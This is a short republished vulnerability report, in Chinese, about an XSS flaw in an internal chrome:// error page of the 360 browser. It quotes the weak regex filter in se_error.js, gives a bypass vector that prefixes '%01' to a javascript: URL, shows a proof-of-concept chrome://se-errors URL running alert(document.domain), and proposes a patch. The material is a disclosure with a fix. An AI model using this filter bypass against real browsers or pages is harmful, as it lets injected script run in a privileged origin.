360安全浏览器chrome域XSS - 网站安全 - 自学php

某chrome域页面过滤不严谨导致XSS.

se_error.js 97line:

if(/^\s*javascript：/i.test(this._error_url)){ this._error_url = ''; }

使用下面这个向量就可以轻松绕过限制:

%01javascript：alert(1)

使用360极速浏览器访问:

chrome://se-errors/?&url=%01javascript：alert(document.domain)&error=dnserror

点击刷新页面即可触发XSS.

修复方案：

source: if(/^\s*javascript：/i.test(this._error_url)){ this._error_url = ''; } patch: var link = document.createElement('a'); link.href = this._error_url; if(link.protocol=='javascript：' || link.protocol=='data:'){ this._error_url = ''; }

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did14873

更新时间：2022-09-13 阅读：65次